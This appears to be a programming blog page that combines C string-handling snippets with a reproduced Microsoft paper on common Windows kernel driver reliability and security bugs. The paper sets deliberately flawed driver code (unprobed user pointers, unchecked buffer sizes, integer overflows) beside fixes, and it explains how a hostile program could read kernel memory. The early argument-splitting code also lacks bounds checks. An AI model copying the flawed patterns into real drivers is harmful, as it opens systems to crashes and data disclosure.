November 22, 2005

Converting WCHAR to CHAR

void wtoA(WCHAR* source,char* dest)
{
	ULONG i;
	for (i = 0;i<wcslen(source)+1;i++){
		dest[i] = (char)source[i];
	}
}

Converting CHAR to WCHAR

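VOID Atow(char* source,WCHAR* dest)
{
	ULONG	i;
	ULONG	length = strlen(source);
	// Copy every character plus the terminating null.
	// dest must have room for length + 1 WCHARs; it is never read,
	// so it does not need to be initialized by the caller.
	for(i = 0;i <= length;i++){
		dest[i] = (WCHAR)(unsigned char)source[i];
	}
}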
//--------------------------------------------------------------------

Splitting a string into its parts

VOID GetArg(char* commAndline,int* Argc,char* Argv[])
{
	ULONG	length;
	ULONG	i = 0;
	ULONG	index = 0;
	length = strlen(commAndline);
	Argv[index] = commAndline;
	index++;
	for(i = 0;i < length;i++){
		if(commAndline[i] == ' '){
			commAndline[i] = '\0';//breAk up
			i++;
			while(commAndline[i] == ' '){
				i++;
			}
			Argv[index] = commAndline + i;
			index ++;
			i--;
		}
	}
	*Argc = index;
}
//--------------------------------------------------------------------

Usage:

int main(void){

	char		str[1024];
	int			Argc;
	char*		Argv[9];
	int			i;

	strcpy(str,"cd windows dfdf f            d");
	GetArg(str,&Argc,Argv);
	for (i = 0;i < Argc;i++){
		printf("%s\n",Argv[i]);
	}
	return 0;
}
//--------------------------------------------------------------------

Result:

cd
windows
dfdf
f
d

A small improvement: it can now handle double quotes. For example, cd "progrAm files" yields the arguments cd and progrAm files.

VOID GetArg(char* commAndline,int* Argc,char* Argv[])
{
	ULONG	length;
	ULONG	i = 0;
	ULONG	index = 0;
	length = strlen(commAndline);
	Argv[index] = commAndline;
	index++;
	for(i = 0;i < length;i++){
		if(commAndline[i] == ' ' && commAndline[i+1] != ' ' && commAndline[i+1] != '\0'){
			commAndline[i] = '\0';//breAk up
			i++;
			while(commAndline[i] == ' ' && i<length){
				i++;
			}
			Argv[index] = commAndline + i;
			index ++;

			if(commAndline[i] == '"'){   // this block handles a double-quoted argument
				commAndline[i] = '\0';
				Argv[index-1] = (char*)Argv[index-1]+1;
				while(commAndline[i] != '"' && i<length){
					i++;
				}
				if (commAndline[i] == '"'){
					commAndline[i] = '\0';
					i--;
				}
			}//if                                //////////////
		}

	}
	*Argc = index;
}
//--------------------------------------------------------------------

Well, one more improvement: adding a maximum argument count

VOID GetArg(char* commAndline,int* Argc,char* Argv[],ULONG	mAxArgc)
{
	ULONG	length;
	ULONG	i = 0;
	ULONG	index = 0;
	length = strlen(commAndline);
	Argv[index] = commAndline;
	index++;
	for(i = 0;i < length;i++){
		if(commAndline[i] == ' ' && commAndline[i+1] != ' ' && commAndline[i+1] != '\0'){
			commAndline[i] = '\0';//breAk up
			i++;
			while(commAndline[i] == ' ' && i<length){
				i++;
			}
			if(index < mAxArgc){				// enforce the maximum argument count: keep only the first mAxArgc arguments
				Argv[index] = commAndline + i;
				index ++;
				// Handle a double-quoted argument. This stays inside the limit check
				// so that a dropped argument never modifies the last stored one.
				if(commAndline[i] == '"'){
					commAndline[i] = '\0';
					Argv[index-1] = (char*)Argv[index-1]+1;
					while(commAndline[i] != '"' && i<length){
						i++;
					}
					if (commAndline[i] == '"'){
						commAndline[i] = '\0';
						i--;
					}
				}//if
			}
		}

	}
	*Argc = index;
}
//--------------------------------------------------------------------

Usage:

int main(void)
{
	char	str[60];
	int		Argc;	// GetArg takes an int*, so Argc must be an int
	PCHAR	Argv[9];
	ULONG	i;

	strcpy(str,"dir  \"progrAm files\" ddd 44 55 66 7 8 9 10 11");
	GetArg(str,&Argc,Argv,9);
	printf("%d\n",Argc);

	for(i = 0;i<Argc;i++){
		printf("%s\n",Argv[i]);
	}

	return 0;
}
//--------------------------------------------------------------------

Result:

9
dir
progrAm files
ddd
44
55
66
7
8
9

November 12, 2005

Common Driver Reliability Issues

Microsoft Corporation

June 2004

Applies to:
   Microsoft Windows 98 / Windows Me
   Microsoft Windows 2000
   Microsoft Windows XP
   Microsoft Windows Server 2003
   Microsoft Windows codenamed "Longhorn"

Summary: This paper provides information about writing drivers for the Microsoft Windows family of operating systems. It describes a number of common errors and suggests how driver writers can find, correct, and prevent such errors. (37 printed pages)

Contents

Introduction
User-Mode Addresses in Kernel-Mode Code
Driver I/O Methods and Their Tradeoffs
Failing to Check Buffer Sizes in Buffered IOCTLs and FSCTLs
Returning Data in Uninitialized Bytes
Failing to Validate Variable-Length Buffers
Device State Validation
Cleanup and Close Routines
Device Control Routines
Synchronization
Shared Access
Locks and Disabling APCs
Handle Validation
Requests to Create and Open Files and Devices
Driver Unload Routines
Pageable Drivers and DPCs
User-Mode APIs
StartIo Recursion
Passing and Completing IRPs
Odd-length Unicode Buffers
Pool Allocation in Low Memory
Call to Action and Resources

Introduction

Drivers occupy a significant portion of the total code base executed in kernel mode. Consequently, efforts to improve the reliability and security of the system must address this large code base.

This paper describes a variety of problems commonly seen in drivers, often with code that shows typical errors, and how to fix them. The code has been edited for brevity.

This paper is for developers who are writing kernel-mode drivers. The information in this paper applies for the Microsoft Windows family of operating systems.

User-Mode Addresses in Kernel-Mode Code

When providing services to user-mode code, drivers and other kernel-mode components usually receive and return data in buffers. To avoid corruption of data, disclosure of sensitive or security-critical data, or exceptions that cannot be handled by the try/except mechanism, kernel components must ensure that each data pointer they receive from user mode is a valid user-mode pointer. This operation is called probing.

Drivers must obey the following rules when handling pointers obtained from user mode:

  • Probe all user-mode pointers before referencing them.

    To probe a pointer, use the macro ProbeForRead or ProbeForWrite, or the memory management routine MmProbeAndLockPages.

  • Enclose all references to user-mode pointers in try/except blocks. The mapping of user-mode memory can change at any instant for various reasons, such as address space deletion, protection change, or decommit. Therefore, any reference to a user-mode pointer could raise an exception.
  • Assume that user-mode pointers can be aligned on any boundary.
  • Be prepared for changes to the contents of user-mode memory at any time; another user-mode thread in the same process might change it. Drivers must not use user-mode buffers as temporary storage, or expect the results of double fetches to yield the same results the second time.
  • Validate all data received from user-mode code.
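The rule about double fetches can be illustrated with a small user-space sketch. The names REQUEST_HEADER, MAX_PAYLOAD, and CopyPayloadCaptured are hypothetical and do not come from the paper. The sketch only shows the capture-then-validate pattern; a real driver would also probe the pointer and wrap each access in a try/except block.

```c
#include <stddef.h>
#include <string.h>

#define MAX_PAYLOAD 64  /* hypothetical limit used only in this sketch */

/* Hypothetical request layout that lives in caller-writable memory. */
typedef struct _REQUEST_HEADER {
    volatile unsigned long Length;        /* another thread may change this */
    unsigned char Payload[MAX_PAYLOAD];
} REQUEST_HEADER;

/*
 * Reads Length exactly once into a local, validates the local, and uses
 * only the local afterwards. Returns the number of bytes copied, or 0 if
 * the captured length is out of range.
 */
size_t CopyPayloadCaptured(const REQUEST_HEADER *Shared,
                           unsigned char *Dest, size_t DestSize)
{
    unsigned long captured = Shared->Length;   /* single fetch */

    if (captured > MAX_PAYLOAD || captured > DestSize) {
        return 0;
    }
    memcpy(Dest, Shared->Payload, captured);
    return captured;
}
```

Because the length is never re-read after the check, a concurrent change to Shared->Length cannot make the copy larger than the value that was validated.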

Handling user-mode pointers incorrectly can result in the following:

  • Crashes caused by references to portions of the kernel address space that the Memory Manager considers reserved. It is a serious error for any driver to reference such address space.
  • Crashes caused by references to input/output (I/O) space, if the architecture uses memory-mapped device registers. Such references (reads and writes) can also have negative effects on the device itself.
  • Disclosure of sensitive data if the caller passes a pointer to an area that is unreadable by user mode, then observes the driver’s responses or return values to deduce the contents of the protected location.
  • Corruption of kernel data structures by writing to arbitrary kernel addresses, which can cause crashes or compromise security.

Probing

To understand when probing is necessary, consider the following sample routines, SetUserData and GetUserData. These samples represent fictitious system service routines, but could also be driver routines keyed on input/output control (IOCTL) or file system control (FSCTL) values; the only difference is that the driver code is more complicated. These routines show a situation in which probing is necessary. To simplify the example, the sample routines do not include locks to prevent race conditions and similar details that normally should be present in such code.

Example Routines That Do Not Use Probing

SetUserData receives a buffer from user mode and copies it to a global location. This routine represents any kernel component that receives data from user mode.

VOID
SetUserData (
    IN PWCHAR DataPtr,    // Pointer from user mode
    IN ULONG DataLength
    )
{
      //
      // Truncate data if it's too big.
      //
      if (DataLength > MAX_DATA_LENGTH) {
          DataLength = MAX_DATA_LENGTH;
      }

      //
      // Copy user buffer to global location.
      //
      memcpy (InternalStructure->UserData, DataPtr, DataLength);
      InternalStructure->UserDataLength = DataLength;
}

GetUserData returns to the caller data that was previously set with SetUserData:

ULONG
GetUserData (
    IN PWCHAR DataPtr, // Pointer from user mode
    IN ULONG DataLength
    )
{
      //
      // Truncate data if it's too big.
      //
      if (DataLength > InternalStructure->UserDataLength) {
           DataLength = InternalStructure->UserDataLength;
      }   

      memcpy (DataPtr, InternalStructure->UserData, DataLength);

      return DataLength;
}

Problems Caused by Failing to Probe

In the examples in the previous section, both SetUserData and GetUserData fail to validate DataPtr. If the pointer is invalid, the caller could cause a system crash, thus compromising operating system integrity. If the pointer specifies a memory address that the caller does not have the right to read, the caller might also be able to deduce the contents of that address. Because the operating system maintains data for all processes in global pool addresses, a caller could pass an invalid pointer and then inspect the returned data for passwords or program output text strings generated by operating system users.

Routines that have pointer validation problems like these could easily be used to compromise system security. A hostile program could repeatedly call SetUserData with kernel addresses, followed by calls to GetUserData to retrieve the contents of the kernel address space. The program could then look for interesting data that is private to other users of the system, such as cached file data for files to which the caller has no access. In this situation, the kernel returns data that the caller has no permission to see.

In addition, reading certain kernel addresses can cause unwanted side effects. For example, some addresses are pageable but should be paged only within certain process contexts, such as thread stacks; in other contexts, a bug check can occur. Also, certain device registers may be mapped into virtual memory. Reading from memory locations that are mapped this way directly affects the hardware. For example, reading from a control register of a programmed I/O device might cause the device to lose incoming data, or might start or stop the device.

Example Routines That Use Probing

Both SetUserData and GetUserData must validate every user-mode pointer. The following shows correct code for SetUserData, which probes user-mode pointers before accessing them.

VOID
SetUserData (
    IN PWCHAR DataPtr, // Pointer from user mode
    IN ULONG DataLength
    )
{
  //
  // Truncate data if it's too big.
  //
  if (DataLength > MAX_DATA_LENGTH) {
     DataLength = MAX_DATA_LENGTH;
  }

  //
  // Copy user buffer to global location.
  //
  try {
       ProbeForRead( DataPtr,
                      DataLength,
                      TYPE_ALIGNMENT( WCHAR ));
       memcpy (InternalStructure->UserData,
               DataPtr, DataLength);
       InternalStructure->UserDataLength = DataLength;
  } except( EXCEPTION_EXECUTE_HANDLER ) {
  // Use GetExceptionCode() to return an error to the
  // caller.
 }
}

The correct code validates the pointer at DataPtr by calling the macro ProbeForRead in a try/except block.

The following shows the corrected code for GetUserData.

ULONG
GetUserData (
    IN PWCHAR DataPtr, // Pointer from user mode
    IN ULONG DataLength
    )
{
  //
  // Truncate data if it's too big.
  //
  if (DataLength > InternalStructure->UserDataLength) {
       DataLength = InternalStructure->UserDataLength;
  }

  try {
       ProbeForWrite( DataPtr,
                      DataLength,
                      TYPE_ALIGNMENT( WCHAR ));
       memcpy (DataPtr, InternalStructure->UserData,
               DataLength);
  } except( EXCEPTION_EXECUTE_HANDLER ) {
       // Use GetExceptionCode() to return an error to the
       // caller.
       DataLength = 0;
  }
  return DataLength;
}

The correct code validates the pointer at DataPtr by calling the macro ProbeForWrite in a try/except block.

Addresses Passed in METHOD_NEITHER IOCTLs and FSCTLs

The I/O Manager does not validate user-mode addresses passed in METHOD_NEITHER IOCTLs and FSCTLs. To ensure that such addresses are valid, the driver must use the ProbeForRead and ProbeForWrite macros, enclosing all buffer references in try/except blocks.

In the following example, the driver does not validate the address passed in the Type3InputBuffer.

case IOCTL_GET_HANDLER: {
      PULONG EntryPoint;

      EntryPoint =
         IrpSp->Parameters.DeviceIoControl.Type3InputBuffer;
      *EntryPoint = (ULONG) DriverEntryPoint;

The following code correctly validates the address and avoids this problem.

case IOCTL_GET_HANDLER: {
      PULONG_PTR EntryPoint;

      EntryPoint =
         IrpSp->Parameters.DeviceIoControl.Type3InputBuffer;

      try {
           if (Irp->RequestorMode != KernelMode) {
               ProbeForWrite(EntryPoint,
                             sizeof( ULONG_PTR ),
                             TYPE_ALIGNMENT( ULONG_PTR ));
           }
           *EntryPoint = (ULONG_PTR)DriverEntryPoint;

      } except( EXCEPTION_EXECUTE_HANDLER ) {
...

Note also that the correct code casts DriverEntryPoint to a ULONG_PTR, instead of a ULONG. This change allows for use of this code in a 64-bit Windows environment.

Pointers Embedded in Buffered I/O Requests

Drivers must similarly validate pointers that are embedded in buffered I/O requests. In the following example, the structure member at arg is an embedded pointer.

struct ret_buf {
   void   *arg; // Pointer embedded in request
   int     rval;
   };

pBuf = Irp->AssociatedIrp.SystemBuffer;
   ...
arg = pBuf->arg; // Fetch the embedded pointer
   ...
// If the pointer is invalid,
// this statement can corrupt the system.
RtlMoveMemory(arg, &info, sizeof(info));

In this example, the driver should validate the embedded pointer by using the ProbeXxx macros enclosed in a try/except block, in the same way as for the METHOD_NEITHER IOCTLs described in the preceding section. Although embedding a pointer allows a driver to return extra information, a driver can more efficiently achieve the same result by using a relative offset or a variable length buffer.
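As a rough user-space sketch of the relative-offset alternative, the following helper resolves an offset and length against the start of a buffer and rejects any range that does not lie inside it. ResolveOffset and its parameters are hypothetical names chosen for illustration.

```c
#include <stddef.h>

/*
 * Returns a pointer to Length bytes located Offset bytes into Buffer, or
 * NULL if that range does not lie entirely inside the buffer. The checks
 * use subtraction, so Offset + Length is never computed and cannot wrap.
 */
void *ResolveOffset(void *Buffer, size_t BufferLength,
                    size_t Offset, size_t Length)
{
    if (Buffer == NULL || Offset > BufferLength) {
        return NULL;
    }
    if (Length > BufferLength - Offset) {
        return NULL;
    }
    return (unsigned char *)Buffer + Offset;
}
```

Because the result always points into the buffer that the I/O Manager already copied, no separate probe of a caller-supplied address is needed for this data.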

Using Handles in User Context

Drivers often manipulate objects using handles, which can come from user mode or kernel mode. If the driver is running in system context, it can safely create and use handles because all threads within the system process are trusted. When running in user context, however, a driver must use handles with care.

Drivers should not create or pass handles to ZwXxx routines. These functions translate to calls to user-mode system services. Another thread in the process can change such handles at any instant. Using or creating handles within a user’s process makes the driver vulnerable to problems, as the following example shows.

status = IoCreateFile(&handle,
                      DesiredAccess,
                      &objectAttributes,
                      &ioStatusBlock,
                      NULL,
                      FILE_ATTRIBUTE_NORMAL,
                      FILE_SHARE_READ,
                      FILE_OPEN,
                      0,
                      NULL,
                      0,
                      CreateFileTypeNone,
                      NULL,
                      IO_NO_PARAMETER_CHECKING);

if ( NT_SUCCESS(status) ) {
   status = ObReferenceObjectByHandle(handle,
                      0,
                      NULL,
                      KernelMode,
                      &ccb->FileObject,
                      &handleInformation);

By the time ObReferenceObjectByHandle is called, the value of handle might have changed if:

  • Another thread closed and reopened the handle.
  • Another thread suspended the first thread and then successively created objects until it received the same handle value back again.

Similarly, handles received from user mode in other ways—for example, in a buffered I/O request—should not be passed to ZwXxx routines. Doing so makes a second transition into the kernel. When the ZwXxx routine runs, the previous processor mode is kernel; all access checks (even those against granted access masks of handles) are disabled. If a caller passes in a read-only handle to a file it lacks permission to write, and the driver then calls ZwWriteFile with the handle, the write will succeed. Similarly, calls to ZwCreateFile or ZwOpenFile with file names provided to the driver will successfully create or open files that should be denied to the caller.

Drivers can use the OBJ_FORCE_ACCESS_CHECK and OBJ_KERNEL_HANDLE flags in the OBJECT_ATTRIBUTES structure to safely use handles to manipulate objects. To set these flags, a driver calls InitializeObjectAttributes with the handle before creating the object.

The OBJ_FORCE_ACCESS_CHECK flag causes the system to perform all access checks on the object being opened. Handles created with OBJ_KERNEL_HANDLE can be accessed only in kernel mode. Drivers should use kernel-mode handles only when necessary, however; use of such handles can affect system performance, because Object Manager calls that use kernel handles attach to the system process. In addition, quota charges are made against the system process, and not against the original caller.

Driver I/O Methods and Their Tradeoffs

Drivers can use the following I/O methods:

  • Buffered I/O
  • Direct I/O
  • Neither buffered nor direct I/O (METHOD_NEITHER I/O)

In general, performance improves by moving from buffered I/O to direct I/O and from direct I/O to METHOD_NEITHER I/O, because the I/O Manager does less for the driver. The driver must do more work to validate requests, however, as the higher performing methods often require significantly more validation code to ensure that the driver is robust.

Buffered I/O

Buffered I/O requests are typically used by interfaces that require small transfer sizes or are called infrequently.

To handle a buffered I/O request, the I/O Manager:

  • Validates the user buffer pointers passed to it.
  • Allocates new buffers from non-paged pool for the input data.
  • Copies the user data to these newly allocated buffers.

The driver operates only on the buffers allocated by the I/O Manager, and not on the buffers allocated by the caller. The driver is therefore not required to validate the buffer pointers or handle exceptions if the caller’s address space becomes invalid.

Buffers allocated by the I/O Manager have the same alignment as allocated pool (8-byte alignment on the 32-bit systems). Consequently, the driver is not required to check for valid buffer alignment. The driver must validate the size and contents of the data, however. The data cannot change asynchronously because user-mode processes do not have access to the buffers.

After the driver completes a buffered I/O request, the I/O Manager executes an asynchronous procedure call (APC) to return to the original process context. The I/O Manager then copies data from the buffers written by the driver to the caller’s user-space output buffer.

Failing to check the size of buffers is perhaps the most common driver error in buffered I/O. This error can occur in many contexts, but is particularly troublesome in the following cases:

  • Failing to check buffer sizes in buffered IOCTLs and FSCTLs.
  • Returning data in uninitialized bytes.
  • Failing to validate variable-length buffers.

These cases are discussed in more detail in the sections that follow.

Failing to Check Buffer Sizes in Buffered IOCTLs and FSCTLs

When handling buffered IOCTLs and FSCTLs, a driver should always check the sizes of the input and output buffers to ensure that the buffers can hold all the requested data. If the RequiredAccess bits in the request specify FILE_ANY_ACCESS, as most driver IOCTLs and FSCTLs do, any caller that has a handle to the device also has access to buffered IOCTL or FSCTL requests for that device, and could read or write data beyond the end of the buffer.

For example, assume that the following code appears in a routine that is called from a dispatch routine, and that the driver has not validated the input buffer sizes passed in the IRP.

switch (ControlCode)
   ...
   ...
   case IOCTL_NEW_ADDRESS:{
      tNEW_ADDRESS *pNewAddress =
        pIrp->AssociatedIrp.SystemBuffer;

        pDeviceContext->Addr = ntohl (pNewAddress->Address);
        ...
  

The example does not check the buffer sizes before assigning a new value to pDeviceContext->Addr. As a result, the reference to pNewAddress->Address can cause a fault if the input buffer is not big enough to contain a tNEW_ADDRESS structure.

The following code checks the buffer sizes, avoiding the potential problem.

case IOCTL_NEW_ADDRESS: {
   tNEW_ADDRESS *pNewAddress =
     pIrp->AssociatedIrp.SystemBuffer;

  if (pIrpSp->Parameters.DeviceIoControl.InputBufferLength >=
       sizeof(tNEW_ADDRESS)){
         pDeviceContext->Addr = ntohl (pNewAddress->Address);
...

Code that handles other buffered I/O, such as WMI requests that use variable size buffers, can have similar errors.

Output buffer problems are similar to input buffer problems. They can easily corrupt the memory pool, and user-mode callers might be unaware that any error has occurred.

In the following example, the driver fails to check the size of the output buffer at SystemBuffer.

case IOCTL_GET_INFO: {

    Info = Irp->AssociatedIrp.SystemBuffer;

    Info->NumIF = NumIF;
    ...
    ...
    Irp->IoStatus.Information =
         NumIF*sizeof(GET_INFO_ITEM)+sizeof(ULONG);
    Irp->IoStatus.Status = ntStatus;
   }

Assuming that the NumIF field of the system buffer specifies the number of input items, this example can set IoStatus.Information to a value larger than the output buffer and thus return too much information to the user-mode caller. The preceding code could corrupt the memory pool by writing beyond the end of the system buffer.

Keep in mind that the I/O Manager does not validate the value in the Information field. The driver must check the output buffer size. If a caller passes a valid kernel-mode address for the output buffer and a buffer size of zero bytes, serious errors can occur.
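The output-size check can be sketched in portable C as follows. INFO_ITEM is a hypothetical stand-in for GET_INFO_ITEM, and InfoReplySize is an illustrative helper, not a system routine. It returns the byte count that would be safe to store in the Information field, or 0 when the reply does not fit.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for the paper's GET_INFO_ITEM. */
typedef struct _INFO_ITEM {
    uint32_t Index;
    uint32_t Flags;
} INFO_ITEM;

/*
 * Returns the number of bytes needed for a reply that holds a 32-bit count
 * followed by NumItems entries, or 0 if the reply does not fit in
 * OutputLength bytes. Dividing the remaining space avoids multiplying
 * NumItems by the entry size, so the check itself cannot overflow.
 */
size_t InfoReplySize(uint32_t NumItems, size_t OutputLength)
{
    size_t header = sizeof(uint32_t);

    if (OutputLength < header) {
        return 0;
    }
    if (NumItems > (OutputLength - header) / sizeof(INFO_ITEM)) {
        return 0;
    }
    return header + (size_t)NumItems * sizeof(INFO_ITEM);
}
```

A driver following this pattern would write to the system buffer and set the Information field only when the helper returns a nonzero size.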

Returning Data in Uninitialized Bytes

Drivers should initialize all output buffers with zeros before returning them to the caller. Failing to initialize a buffer can result in the inadvertent return of kernel-mode data in uninitialized bytes.

In the following example, a driver fails to initialize the buffer and thus unintentionally returns data in uninitialized bytes.

case IOCTL_GET_NAME: {
   ...
   ...
   outputBufferLength =
      ioStack->Parameters.DeviceIoControl.OutputBufferLength;
   outputBuffer =
      (PGET_NAME) Irp->AssociatedIrp.SystemBuffer;

   if (outputBufferLength >= sizeof(GET_NAME)) {
      length = outputBufferLength - sizeof(GET_NAME);
      ntStatus = IoGetDeviceProperty(
                  DeviceExtension->PhysicalDeviceObject,
                  DevicePropertyDriverKeyName,
                  length,
                  outputBuffer->DriverKeyName,
                  &length);

      outputBuffer->ActualLength = length + sizeof(GET_NAME);
      Irp->IoStatus.Information = outputBufferLength;
   } else {
     ntStatus = STATUS_BUFFER_TOO_SMALL;
   }

Setting IoStatus.Information to the output buffer size causes the whole output buffer to be returned to the caller. The I/O Manager does not initialize the data beyond the size of the input buffer—the input and output buffers overlap for a buffered request. Because the system support routine IoGetDeviceProperty does not write the entire buffer, this IOCTL returns uninitialized data to the caller.
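A minimal user-space sketch of the safer pattern appears below: clear the output buffer, write the data, and report only the bytes actually written. FillNameReply is a hypothetical helper. In a buffered request the zeroing would have to happen after the driver has finished reading its input, because the input and output share the same system buffer.

```c
#include <stddef.h>
#include <string.h>

/*
 * Clears Output, copies NameLength bytes of Name into it, and returns the
 * number of bytes that should be reported to the caller. Returns 0 without
 * touching Output if the name does not fit.
 */
size_t FillNameReply(unsigned char *Output, size_t OutputLength,
                     const char *Name, size_t NameLength)
{
    if (NameLength > OutputLength) {
        return 0;
    }
    memset(Output, 0, OutputLength);   /* clear stale bytes first */
    memcpy(Output, Name, NameLength);
    return NameLength;                 /* report only what was written */
}
```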

Some drivers use the Information field to return codes that provide extra details about I/O requests. Before doing so, such drivers should check the IRP flags to ensure that IRP_INPUT_OPERATION is not set. When this flag is not set, the IOCTL or FSCTL does not have an output buffer, so the Information field does not supply a buffer size. In this case, the driver can safely use the Information field to return its own code.

Failing to Validate Variable-Length Buffers

Drivers should always validate variable-length buffers. Failure to do so can cause integer underflows and overflows.

Drivers often use input buffers with fixed headers and trailing variable-length data, as in the following example.

typedef struct _WAIT_FOR_BUFFER {
   LARGE_INTEGER Timeout;
   ULONG NameLength;
   BOOLEAN TimeoutSpecified;
   WCHAR Name[1];
   } WAIT_FOR_BUFFER, *PWAIT_FOR_BUFFER;

if (InputBufferLength < sizeof(WAIT_FOR_BUFFER)) {
    IoCompleteRequest( Irp, STATUS_INVALID_PARAMETER );
    return( STATUS_INVALID_PARAMETER );
   }

WaitBuffer = Irp->AssociatedIrp.SystemBuffer;

if (FIELD_OFFSET(WAIT_FOR_BUFFER, Name[0]) +
       WaitBuffer->NameLength > InputBufferLength) {
         IoCompleteRequest( Irp, STATUS_INVALID_PARAMETER );
         return( STATUS_INVALID_PARAMETER );
   }

Adding WaitBuffer->NameLength (a ULONG) to the offset (a LONG) can cause an integer overflow if the ULONG value is large. Instead, the driver should subtract the offset from InputBufferLength, and compare the result with WaitBuffer->NameLength, as in the following example.

if (InputBufferLength < sizeof(WAIT_FOR_BUFFER)) {
    IoCompleteRequest( Irp, STATUS_INVALID_PARAMETER );
    return( STATUS_INVALID_PARAMETER );
   }

WaitBuffer = Irp->AssociatedIrp.SystemBuffer;

if ((InputBufferLength -
     FIELD_OFFSET(WAIT_FOR_BUFFER, Name[0])) <
       WaitBuffer->NameLength) {
    IoCompleteRequest( Irp, STATUS_INVALID_PARAMETER );
    return( STATUS_INVALID_PARAMETER );
   }

The subtraction shown in the preceding example cannot cause an integer underflow, because the first if statement ensures that the input buffer length is greater than or equal to the size of WAIT_FOR_BUFFER, which is in turn at least as large as the offset of the Name member.
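The same subtraction-based check can be exercised outside the kernel. The sketch below mirrors the structure with fixed-width types. WAIT_FOR_BUFFER_SKETCH and NameLengthIsValid are hypothetical names, and the exact field offsets depend on the compiler's padding.

```c
#include <stddef.h>
#include <stdint.h>

/* User-space mirror of WAIT_FOR_BUFFER, using fixed-width types. */
typedef struct _WAIT_FOR_BUFFER_SKETCH {
    int64_t  Timeout;
    uint32_t NameLength;
    uint8_t  TimeoutSpecified;
    uint16_t Name[1];
} WAIT_FOR_BUFFER_SKETCH;

/* Returns 1 if the declared name fits in the input buffer, otherwise 0. */
int NameLengthIsValid(size_t InputBufferLength, uint32_t NameLength)
{
    size_t offset = offsetof(WAIT_FOR_BUFFER_SKETCH, Name);

    if (InputBufferLength < sizeof(WAIT_FOR_BUFFER_SKETCH)) {
        return 0;
    }
    /* Safe: sizeof(struct) >= offset, so the subtraction cannot wrap. */
    return NameLength <= InputBufferLength - offset;
}
```

A NameLength of 0xFFFFFFFF is rejected here, whereas adding it to the offset in 32-bit arithmetic would wrap to a small value and pass the original test.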

The following example shows a more complicated overflow problem.

case IOCTL_SET_VALUE:
      dwSize = sizeof(SET_VALUE);

    if(inputBufferLength < dwSize) {
       ntStatus = STATUS_BUFFER_TOO_SMALL;
       break;
    }

    dwSize = FIELD_OFFSET(SET_VALUE, pInfo[0]) +
            pSetValue->NumEntries * sizeof(SET_VALUE_INFO);

    if(inputBufferLength < dwSize) {
       ntStatus = STATUS_BUFFER_TOO_SMALL;
       break;
    }

In this example, an integer overflow can occur during multiplication. If the size of the SET_VALUE_INFO structure is a multiple of two, a NumEntries value such as 0x80000000 results in an overflow when the bits are shifted left during multiplication. The buffer size passes the validation test, however, because the overflow causes dwSize to contain a small number. To avoid this problem, subtract the buffer lengths as shown in the previous example, then divide by sizeof(SET_VALUE_INFO) and compare the result with NumEntries to ensure that the buffer is the correct size.
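The following user-space sketch shows both the wrapping calculation and the divide-and-compare check described above. The structure layouts and the names NaiveSize and EntryCountIsValid are assumptions made for illustration; the paper does not define SET_VALUE or SET_VALUE_INFO.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical layouts standing in for SET_VALUE_INFO and SET_VALUE. */
typedef struct _SET_VALUE_INFO_SKETCH {
    uint32_t Id;
    uint32_t Value;
} SET_VALUE_INFO_SKETCH;

typedef struct _SET_VALUE_SKETCH {
    uint32_t NumEntries;
    SET_VALUE_INFO_SKETCH pInfo[1];
} SET_VALUE_SKETCH;

/* The flawed calculation: the 32-bit result wraps for a large NumEntries. */
uint32_t NaiveSize(uint32_t NumEntries)
{
    return (uint32_t)((uint32_t)offsetof(SET_VALUE_SKETCH, pInfo) +
                      NumEntries * (uint32_t)sizeof(SET_VALUE_INFO_SKETCH));
}

/* The safer check: subtract the header, divide, then compare counts. */
int EntryCountIsValid(size_t InputBufferLength, uint32_t NumEntries)
{
    size_t available;

    if (InputBufferLength < sizeof(SET_VALUE_SKETCH)) {
        return 0;
    }
    available = (InputBufferLength - offsetof(SET_VALUE_SKETCH, pInfo)) /
                sizeof(SET_VALUE_INFO_SKETCH);
    return NumEntries <= available;
}
```

With an 8-byte entry, NaiveSize(0x80000000) wraps to just the header offset, so a size comparison would accept the request, while EntryCountIsValid rejects it.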

Direct I/O

Drivers for devices that can transfer large amounts of data at a time, such as mass storage devices, typically use direct I/O. To handle a direct I/O request, the I/O Manager allocates the input buffer from non-paged pool and, if the length of the buffer is nonzero, creates a memory descriptor list (MDL) to map the output buffer. For an input request, the I/O Manager checks the output buffer for read access; for an output request, it checks the buffer for write access.

Drivers access the output buffer by calling the MmGetSystemAddressForMdlSafe macro to map the MDL into a system address range. This system address range contains the same physical pages as the original user buffer, but is unaffected by virtual address changes in the calling application. Drivers can therefore rely on the address to remain valid.

Because the user’s address space is doubly mapped to the system address range, two different virtual addresses have the same physical address. The following consequences of double mapping can sometimes cause problems for drivers:

  • The offset into the virtual page of the user’s address becomes the offset into the system page.

    Access beyond the end of the system buffer might go unnoticed for long periods of time depending on the page granularity of the mapping. Unless a caller’s buffer is allocated near the end of a page, data written beyond the end of the buffer will nevertheless appear in the buffer, and the caller will be unaware that any error has occurred. If the end of the buffer coincides with the end of a page, the system virtual addresses beyond the end could point to anything, or could be invalid. Such problems can be extremely difficult to find.

  • If the calling process has another thread that modifies the user’s mapping of the memory, the contents of the system buffer will change when the user’s memory mapping changes.

    In this situation, using the system buffer to store scratch data can cause problems. Two fetches from the same memory location might yield different values.

In addition, during read requests, drivers must not write to mapped areas that they have locked for read access. Inadvertently writing to an area that is locked for read access could allow a user-mode application to corrupt the global system state.

The most common direct I/O problem is incorrectly handling zero-length buffers. Because the I/O Manager does not create MDLs for zero-length transfers, a zero-length buffer results in a NULL value at Irp->MdlAddress. If a driver passes a NULL MdlAddress to MmGetSystemAddressForMdlSafe, mapping fails and the macro returns NULL. Drivers should always check for a NULL return value before attempting to use the returned address.

The following code snippet shows one possible error in direct I/O. The example receives a string in a direct I/O request, and then tries to convert that string to uppercase characters.

PWCHAR  PortName = NULL;

PortName = (PWCHAR)MmGetSystemAddressForMdlSafe
                   (irp->MdlAddress, NormalPagePriority);

//
// Null-terminate the PortName so that RtlInitUnicodeString
// will not be invalid.
//
PortName[Size / sizeof(WCHAR) - 1] = UNICODE_NULL;

RtlInitUnicodeString(&AdapterName, PortName);

Because the buffer might not be correctly formed, the code attempts to force a Unicode NULL as the last buffer character. If the underlying physical memory is doubly mapped to both a user-mode and a kernel-mode address, another thread in the process can overwrite the buffer as soon as this write operation completes. If the UNICODE NULL character is not present, however, the call to RtlInitUnicodeString can exceed the range of the buffer and, if it falls outside the system mapping, possibly cause a bug check.
